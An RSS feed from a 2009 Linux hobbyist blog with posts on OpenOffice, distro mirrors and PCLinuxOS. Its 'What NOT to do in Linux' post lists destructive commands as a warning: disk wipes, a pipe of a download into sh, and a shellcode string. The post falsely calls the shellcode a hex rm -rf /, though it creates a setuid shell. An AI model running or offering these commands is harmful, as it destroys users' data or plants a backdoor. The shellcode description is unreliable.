<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>LinuxLefty's personal blog - Linux</title>
    <link>http://www.linuxlefty.com/blog/</link>
    <description>My little place on the web...</description>
    <dc:language>en</dc:language>
    <generator>Serendipity 1.4.1 - http://www.s9y.org/</generator>
    <pubDate>Mon, 09 Mar 2009 18:00:05 GMT</pubDate>

    <image>
        <url>http://www.linuxlefty.com/blog/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: LinuxLefty's personal blog - Linux - My little place on the web...</title>
        <link>http://www.linuxlefty.com/blog/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>OpenOffice Impress's Presenter Screen</title>
    <link>http://www.linuxlefty.com/blog/archives/64-OpenOffice-Impresss-Presenter-Screen.html</link>
            <category>Computers</category>
            <category>Linux</category>
    
    <comments>http://www.linuxlefty.com/blog/archives/64-OpenOffice-Impresss-Presenter-Screen.html#comments</comments>
    <wfw:comment>http://www.linuxlefty.com/blog/wfwcomment.php?cid=64</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.linuxlefty.com/blog/rss.php?version=2.0&amp;type=comments&amp;cid=64</wfw:commentRss>
    

    <author>nospam@example.com (LinuxLefty)</author>
    <content:encoded>
    &lt;p&gt;I recently discovered a plugin that makes OpenOffice&#039;s Impress, a whole 
lot easier to use. It allows the audience to see the presentation, but 
the presenter sees the current slide, a preview of the next slide, the 
notes corresponding to the current slide and a timer. It is really nice 
to see a preview of the next slide (or of any slide) and to see your 
notes without showing them to the audience. Brilliant!&lt;/p&gt;

&lt;p&gt;http://wiki.services.openoffice.org/wiki/Presenter_Screen&lt;/p&gt;
 
    </content:encoded>

    <pubDate>Mon, 09 Mar 2009 12:00:05 -0600</pubDate>
    <guid isPermaLink="false">http://www.linuxlefty.com/blog/archives/64-guid.html</guid>
    
</item>
<item>
    <title>What NOT to do in Linux</title>
    <link>http://www.linuxlefty.com/blog/archives/54-What-NOT-to-do-in-Linux.html</link>
            <category>Computers</category>
            <category>Linux</category>
    
    <comments>http://www.linuxlefty.com/blog/archives/54-What-NOT-to-do-in-Linux.html#comments</comments>
    <wfw:comment>http://www.linuxlefty.com/blog/wfwcomment.php?cid=54</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.linuxlefty.com/blog/rss.php?version=2.0&amp;type=comments&amp;cid=54</wfw:commentRss>
    

    <author>nospam@example.com (LinuxLefty)</author>
    <content:encoded>
    &lt;p&gt;Linux gives you a lot of power, including the power to shoot yourself in the foot.&lt;/p&gt;

&lt;p&gt;Here are some commands that you &lt;strong&gt;DO NOT&lt;/strong&gt; want to do! Hopefully this will save you some grief from some wisecrack that tells you to run &quot;these magical commands&quot;.&lt;/p&gt;

&lt;p&gt;[geshi lang=bash]rm -rf /[/geshi]&lt;/p&gt;

&lt;p&gt;This will delete all the files and directories from all devices currently mounted as read-write under Linux. (i.e. all your files go &quot;poof!&quot;)&lt;/p&gt;

&lt;p&gt;[geshi lang=bash]char esp[] &lt;strong&gt;attribute&lt;/strong&gt; ((section(&quot;.text&quot;))) /* e.s.p
release */
= &quot;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&quot;
&quot;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&quot;
&quot;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&quot;
&quot;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&quot;
&quot;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&quot;
&quot;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&quot;
&quot;\x6e\x2f\x73\x68\x00\x2d\x63\x00&quot;
&quot;cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;&quot;;
[/geshi]&lt;/p&gt;

&lt;p&gt;This is the hex version of &lt;tt&gt;rm -rf /&lt;/tt&gt;. A lot harder to spot!&lt;/p&gt;

&lt;p&gt;[geshi lang=bash]mkfs.ext3 /dev/sda[/geshi]&lt;/p&gt;

&lt;p&gt;This will reformat your /dev/sda device (usually your primary hard drive)&lt;/p&gt;

&lt;p&gt;[geshi lang=bash]dd if=/dev/zero of=/dev/sda[/geshi]&lt;/p&gt;

&lt;p&gt;This will blank (i.e. factory default) your hard drive&lt;/p&gt;

&lt;p&gt;This is known as a &lt;a href=&quot;http://en.wikipedia.org/wiki/Forkbomb&quot;&gt;forkbomb&lt;/a&gt; that will start a huge amount of processes until the system crashes&lt;/p&gt;

&lt;p&gt;[geshi lang=bash]wget http://some_untrusted_source -O- | sh[/geshi]&lt;/p&gt;

&lt;p&gt;This will download some source code from the Internet and then execute it on your computer&lt;/p&gt;

&lt;p&gt;[geshi lang=bash]kill -6 1[/geshi]&lt;/p&gt;

&lt;p&gt;This will force your kernel to panic (i.e. your computer will crash)&lt;/p&gt;

&lt;p&gt;Compiled from: this &lt;a href=&quot;http://www.junauza.com/2008/11/7-deadly-linux-commands.html&quot;&gt;blog post&lt;/a&gt; and comments&lt;/p&gt;
 
    </content:encoded>

    <pubDate>Thu, 20 Nov 2008 23:16:52 -0700</pubDate>
    <guid isPermaLink="false">http://www.linuxlefty.com/blog/archives/54-guid.html</guid>
    
</item>
<item>
    <title>Our Computers are Geeky</title>
    <link>http://www.linuxlefty.com/blog/archives/18-Our-Computers-are-Geeky.html</link>
            <category>Computers</category>
            <category>Linux</category>
    
    <comments>http://www.linuxlefty.com/blog/archives/18-Our-Computers-are-Geeky.html#comments</comments>
    <wfw:comment>http://www.linuxlefty.com/blog/wfwcomment.php?cid=18</wfw:comment>

    <slash:comments>1</slash:comments>
    <wfw:commentRss>http://www.linuxlefty.com/blog/rss.php?version=2.0&amp;type=comments&amp;cid=18</wfw:commentRss>
    

    <author>nospam@example.com (LinuxLefty)</author>
    <content:encoded>
    &lt;p&gt;I just realized today that soon no two computers in our home will be running the same operating system.&lt;/p&gt;

&lt;p&gt;Our family computer downstairs runs EXTLINK:@http://www.google.com/notebook/public/04230921465548081248/BDSJaSwoQjPG8odch|PCLinuxOS@, Philip runs EXTLINK:@http://linuxmint.com/|Linux Mint@, Natalie uses EXTLINK:@http://kubuntu.com/|KUbuntu@. I currently am using PCLinuxOS, but I think that I will be switching to EXTLINK:@http://www.pcbsd.org|PC-BSD@ some time soon. Notice that there is no mention of windows... &lt;img src=&quot;http://www.linuxlefty.com/blog/templates/default/img/emoticons/laugh.png&quot; alt=&quot;:-D&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I&#039;ve tried windows, and many distros of Linux and I&#039;m ready to move onto something new. I&#039;ve been itching to try BSD, so I&#039;m going to give PC-BSD a try.&lt;/p&gt;

&lt;p&gt;Just for fun, I decided to compile a list of operating systems (and linux distros) that I&#039;ve tried and installed. Some I&#039;ve used for quite a while and others I&#039;ve just used only briefly:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Windows ( 3.1, 98, XP )&lt;/li&gt;
&lt;li&gt;DOS&lt;/li&gt;
&lt;li&gt;Ubuntu ( Ubuntu , KUbunu and XUbuntu )&lt;/li&gt;
&lt;li&gt;Red Hat&lt;/li&gt;
&lt;li&gt;SUSE&lt;/li&gt;
&lt;li&gt;Gentoo&lt;/li&gt;
&lt;li&gt;Mandrake ( now Mandriva )&lt;/li&gt;
&lt;li&gt;PCLinuxOS&lt;/li&gt;
&lt;li&gt;Debian&lt;/li&gt;
&lt;li&gt;ReactOS&lt;/li&gt;
&lt;li&gt;Knoppix ( LiveCD )&lt;/li&gt;
&lt;li&gt;Morphix ( LiveCD )&lt;/li&gt;
&lt;li&gt;Fedora&lt;/li&gt;
&lt;li&gt;SAM Linux&lt;/li&gt;
&lt;li&gt;DSL&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So from all these, I&#039;ve learned that there is no perfect operating system, even Linux &lt;img src=&quot;http://www.linuxlefty.com/blog/templates/default/img/emoticons/wink.png&quot; alt=&quot;;-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt;
 
    </content:encoded>

    <pubDate>Tue, 17 Apr 2007 18:57:05 -0600</pubDate>
    <guid isPermaLink="false">http://www.linuxlefty.com/blog/archives/18-guid.html</guid>
    
</item>
<item>
    <title>Mirror, Mirror, on the Wall</title>
    <link>http://www.linuxlefty.com/blog/archives/10-Mirror,-Mirror,-on-the-Wall.html</link>
            <category>Computers</category>
            <category>Linux</category>
            <category>Website</category>
    
    <comments>http://www.linuxlefty.com/blog/archives/10-Mirror,-Mirror,-on-the-Wall.html#comments</comments>
    <wfw:comment>http://www.linuxlefty.com/blog/wfwcomment.php?cid=10</wfw:comment>

    <slash:comments>4</slash:comments>
    <wfw:commentRss>http://www.linuxlefty.com/blog/rss.php?version=2.0&amp;type=comments&amp;cid=10</wfw:commentRss>
    

    <author>nospam@example.com (LinuxLefty)</author>
    <content:encoded>
    &lt;p&gt;Mirror, mirror, on the wall, which is the best distro of them all?&lt;/p&gt;

&lt;p&gt;My hosting provider recently upgraded everyone&#039;s month bandwidth limit to 2 Terabytes. I wasn&#039;t sure what to do with all this extra bandwidth, so I decided be help mirror some popular but under-mirrored Linux distributions. Currently I am hosting 4 different &quot;flavors&quot; of Linux:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.linuxlefty.com/projects/mirrors/dreamlinux/noshow_img/logo.png&quot; alt=&quot;Dream Linux&quot; style=&quot;margin:1em&quot;/&gt;
&lt;img src=&quot;http://www.linuxlefty.com/projects/mirrors/LinuxMint/noshow_img/logo.png&quot; alt=&quot;Linux Mint &quot;style=&quot;margin:1em&quot;/&gt;
&lt;img src=&quot;http://www.linuxlefty.com/projects/mirrors/SabayonLinux/noshow_img/logo.png&quot; alt=&quot;Sabayon Linux&quot; style=&quot;margin:1em&quot;/&gt;
&lt;img src=&quot;http://www.linuxlefty.com/projects/mirrors/sam-linux/noshow_img/logo.gif&quot; alt=&quot;Sam Linux&quot; style=&quot;margin:1em&quot;/&gt;&lt;/p&gt;

&lt;p&gt;These can all be downloaded at &lt;a href=&quot;http://www.linuxlefty.com/projects/mirrors&quot;&gt;http://www.linuxlefty.com/projects/mirrors&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Last month, my bandwidth usage was 82 Meg. However, yesterday alone I used up 100 Gigs of bandwidth. Hopefully this will take a little load off of the projects&#039; main servers &lt;img src=&quot;http://www.linuxlefty.com/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt;
 
    </content:encoded>

    <pubDate>Mon, 26 Feb 2007 07:48:07 -0700</pubDate>
    <guid isPermaLink="false">http://www.linuxlefty.com/blog/archives/10-guid.html</guid>
    
</item>
<item>
    <title>PCLinuxOS</title>
    <link>http://www.linuxlefty.com/blog/archives/9-PCLinuxOS.html</link>
            <category>Computers</category>
            <category>Linux</category>
    
    <comments>http://www.linuxlefty.com/blog/archives/9-PCLinuxOS.html#comments</comments>
    <wfw:comment>http://www.linuxlefty.com/blog/wfwcomment.php?cid=9</wfw:comment>

    <slash:comments>6</slash:comments>
    <wfw:commentRss>http://www.linuxlefty.com/blog/rss.php?version=2.0&amp;type=comments&amp;cid=9</wfw:commentRss>
    

    <author>nospam@example.com (LinuxLefty)</author>
    <content:encoded>
    &lt;p&gt;I&#039;ve used EXTLINK:@http://www.ubuntu.com/|Ubuntu Linux@ for a number of years and have found it to be an excellent distro of Linux. It is by far one of the most popular (if not &lt;u&gt;the&lt;/u&gt; most popular) version of Linux around and has a huge user base.&lt;/p&gt;

&lt;p&gt;However, I&#039;ve been looking into trying a different distro for some time now. I enjoy trying out different distros to see what is available in the Linux community. I&#039;ve tried almost 15 different distros, covering every major one out there ( other than Arch and Slackware ). I came across EXTLINK:@http://www.pclinuxos.com|PCLinuxOS@ last week and was hoping to install it over spring break.&lt;/p&gt;

&lt;p&gt;However, for some reason my root partition ( I did a cold reboot when the system hung doing a hard-drive intensive operation ) got corrupted and I needed to reinstall my OS. I really didn&#039;t want to take the time to reinstall, but this is my only system and I need it for school.&lt;/p&gt;

&lt;p&gt;So, I installed PCLinuxOS and I was very impressed. All my hardware worked out of the box (even 3D acceleration with aiglx). I was very impressed! The system is very responsive and snappy. I haven&#039;t used it for long, but I think PCLinuxOS is definitely a distro to check into!&lt;/p&gt;
 
    </content:encoded>

    <pubDate>Mon, 19 Feb 2007 15:29:38 -0700</pubDate>
    <guid isPermaLink="false">http://www.linuxlefty.com/blog/archives/9-guid.html</guid>
    
</item>

</channel>
</rss>